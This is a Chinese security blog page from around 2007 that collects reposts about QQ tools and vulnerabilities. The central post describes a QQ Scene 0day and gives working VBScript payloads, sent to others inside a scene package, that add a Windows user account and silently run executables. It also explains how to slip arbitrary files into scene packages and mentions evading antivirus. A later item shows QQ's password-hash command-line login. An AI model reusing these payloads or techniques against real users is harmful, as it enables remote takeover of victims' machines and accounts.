鬼仔's Blog

鬼仔注：不知道这文章的原作者是谁，不过我到这个QQ_Bot的官方站看了看，发现出了新版本，今天下午刚出的，支持100个群，去掉原来的分组功能。他站的米很帅，qq.im
下载地址：http://download.qq.im/QQ_Bot-0.1.0.0.rar

来源：心动吧总博客

什么是QQ群互通

比如你加入了两个QQ群，群A和群B。这两个群的人数上限都是100人，为了使这两个群中的会员可以相互交流，那么我们就需要通过一个手段把这两个群桥接起来，实现两个群间信息可以共享，相互交流。
配置步骤

在这里我们实用一款名叫QQ_Bot的QQ群互通工具，首先感谢该程序的原作者给我们提供一个这么方便的小工具，其主页地址是：http://refile.googlepages.com/qq_bot
阅读全文 »

鬼仔注：作者发的时候没有发图。

作者：JiaJia [YuLv]
来源：JiaJia's Home

声明：本文已发表到2007.09期的《黑客手册》杂志上，转载请注明。

说明：该漏洞是由QQ2007b3狂人DIY版中的vbscript.dll文件所引起的，在原版的QQ2007b3下不存在这个问题。（在光盘中提供了补丁文件，如果您现在使用的是狂人DIY版覆盖原来的文件即可解决此问题。）

起因与发现：

在七月的某天深夜，我挂着QQ在写AntiARP-DNS(广告：它一个不错的防ARP攻击的绿色免费工具)的时候，突然莫名其妙的弹出一个对话框，内容大概是“深夜我入侵了你…… By XXX”，如图1。当时把我一愣，刹那间脸都黑了一半，脑子中浮现出一句话“啊！难道真的被人家当肉鸡给玩弄 阅读全文 »

此文以发布在200709期X档案
转载请著明出自http://www.52cmd.cn

QQ也来玩0day漏洞
雕牌/杜华军(52cmd.cn)

再次申明：当您看到本文的时候，TX已经封了此漏洞，但是大家不要灰心，因为还可以突破，此文只是把具体执行写清楚了。图略

一，起因
起初研究这个漏洞并不是我发起的，上次写的那个baidu挂马的文章相信大家已经看了，那天教主忽然找我，说那QQ场景是比较脆弱的地方，也许能加载swf文件。后来失败告终。教主差不多放弃了，我闲着也是闲着。继续研究场景……

二，测试+利用
阅读全文 »

update(2007.8.14 22:00):在雕牌那里看到了点相关资料，更新下。补充在下面。

鬼仔注：我这里测试有的成功，有的不成功，原因不明。同样的版本的情况下，有的成功，有的失败。比如同样的beta1，有的失败，有的成功，beta4也有的失败，有的成功。当然，VBScript.qqs中的脚本可以自己修改，达到别的目的。利用场景。懒得贴图了，自己测试吧。

来源：Crab's Blog

把那3个文件解到\Tencent\QQ\IMScene\Scene\

用记事本打开VBScript.qqs
最下边 有那个代码了
然后在场景中发给别人

下载：qq.rar

相关资料（来源：雕牌's blog）
关于那QQ 0day 一点资料，现在把具体过程写出来，大家看看吧，也许有人能突破。我在blog上早就说明了，我不装B，这个QQ的测试，我从没拿外面的人测试，你们说，我算是装B么。再说了，我blog写这个的时候就说过，还在测试中，从没说已经成功利用，一直卡在执行文件那一步。
测试过程：
一开始和教主测试的时候是因为ms的播放器能够播放swf文件。这个我在上个月就写过文章了，当初是测试QQ场景的播放器，但是发现无法触发这个漏洞，因为这个播放器不是使用的MS播放的。所以后来教主貌似去测试别的东西了，我呢，继续测这个QQ，前几天测试的时候做了几个包，有弹框框的包，有传exe的包，有使对放QQ崩溃的包。这个QQ的漏洞想必大家应该都清楚了。我还是简单说说。
问题文件确实是在QQ场景里面，场景里面有一个图片文件和VBScript.qqs，Config.qqs，文件。每个文件的具体作用简单说说，那个图片文件不用说了，就是场景的背景。Config.qqs文件的内容是：

<?xml version="1.0" encoding="gb2312"?><theme ver="1" GUID="8B7A99E866CC454DBE2A7F6238EE8F20">
<Scene Type="1" BackGroupColor="#FFFFFF" FriendCaptionColor="#0000FF" MineCaptionColor="#000000" MsgTextColor="#000000" SystemRequestColor="#000000" SystemResultColor="#000000">
<Normal>
<SOUND Loop="true" SourcePath="E000001.mp3"/>
</Normal>
<Action name="动作01" type="1">
<ActionData>
<SOUND UseNormalSound="false" Loop="true" SourcePath="E000001.mp3"/>
</ActionData>
</Action>
</Scene>
</theme>

一目了然。VBScript.qqs这个文件的作用是一段些'动画参数，初始化帧动画参数，初始化背景图片位置，场景窗口大小改变的时候重新布置场景等等事件的脚本。看文件名字就知道是VBS脚本。
但是这个VBS脚本不是用winds下的vbs.dll解析的，而是用的QQ自己目录下的一个vbs*.dll文件解析的。VBS能做什么，大家比我再清楚不过了，VBS下载者，执行，病毒。功能强大。加用户什么的都是轻而易举。这里给几个VBS脚本出来，大家如果对这个漏洞还有兴趣，可以自己去测试测试，
add user:

dim objshell
set objshell = wscript.createOBject("wscript.shell")
iReturn = objshell.Run("net user x x /add",0,TRUE)


run dos exe:

dim ws
Set ws = WScript.CreateObject("WScript.Shell")
iReturn = ws.Run("test.exe",0,TRUE)


run gui exe:

dim wsh
dim Js1
Js1 ="t1est.exe"
set wsh=WScript.CreateObject("WScript.Shell")
wsh.Run(Js1)

还有如果用VBS下载着记得免杀，因为测试的时候被杀，所以后来才去研究传任意文件。那么如何传任意文件，下面介绍的这个方法在我们测试期间都成功过，但是今天测试的时候貌似不成功。方法写出来。
这个方法也是在研究swf的时候发现的，因为制作场景不支持添加swf文件。后来就想办法。先制作QQ安装包，里面添加音乐。那音乐就是swf改后缀的文件。添加后再生成包。再用UE或者别的16进制编辑的。查找里面mp3后缀，改掉就成了。这个地方也许还有研究，就是他生成的文件为什么一定在QQ的 IMScene\Scene\这个目录呢，如果在这里就能改变他的路径，直接写到启动里面不就OK了，关于这个我没测试成功，还等待各位牛人发现。再次申明这个传任意文件的这个漏洞貌似TX已经封了，不是很清楚，也许今天测试掉了步骤。关于这个漏洞大家有什么看法，或者新的想法，可以跟帖，欢迎一起测试。

来源：绝对零度 blog

以下启动QQ调用
QQ.exe /START QQUIN:[QQ号] [算出的密码] /STAT:[是否隐身]
隐身/不隐身: 40/41
例:D:\Program Files\Tencent\QQ\QQ.exe /START QQUIN:12345678 PWDHASH:JdVa0oOqQAr0ZMdtcTwHrQ== /STAT:41

以下密码算法调用
[/code]
Public Function Str2QQPwdHash(Str1 As String)

Str2QQPwdHash = Hex2Base64(MD5(Str1, 32)) & "=="

End Function

以下模块代码

Private m_lOnBits(30)
阅读全文 »

鬼仔注：怕TX追究责任？也许不是这个想法。
但是这样叫做开源吗？要想获得代码，还有三个条件。何谓开源？

信息来源：cnBeta

种种原因,飘云决定小范围开源。

由于这次开放的代码对加入者要求难度比较高。

本次开源只是为了更好的研究技术，因此要获得完整的代码，要分为三个步骤的。

想获得代码者要确信自己懂的如何写钩子程序、看得懂汇编，有耐心分析协议。

如果你认为你可以做到这么三点，那么你可以PM给我。

我会先给一个钩子的程序给您，然后您可以自行写几个Demo

下面的步骤是给汇编的代码。并简单的提示。

第三步是讲解是如何分析协议的过程。

飘云社区公告地址：http://bbs.pyqq.cn/notice.php?fid=-1#91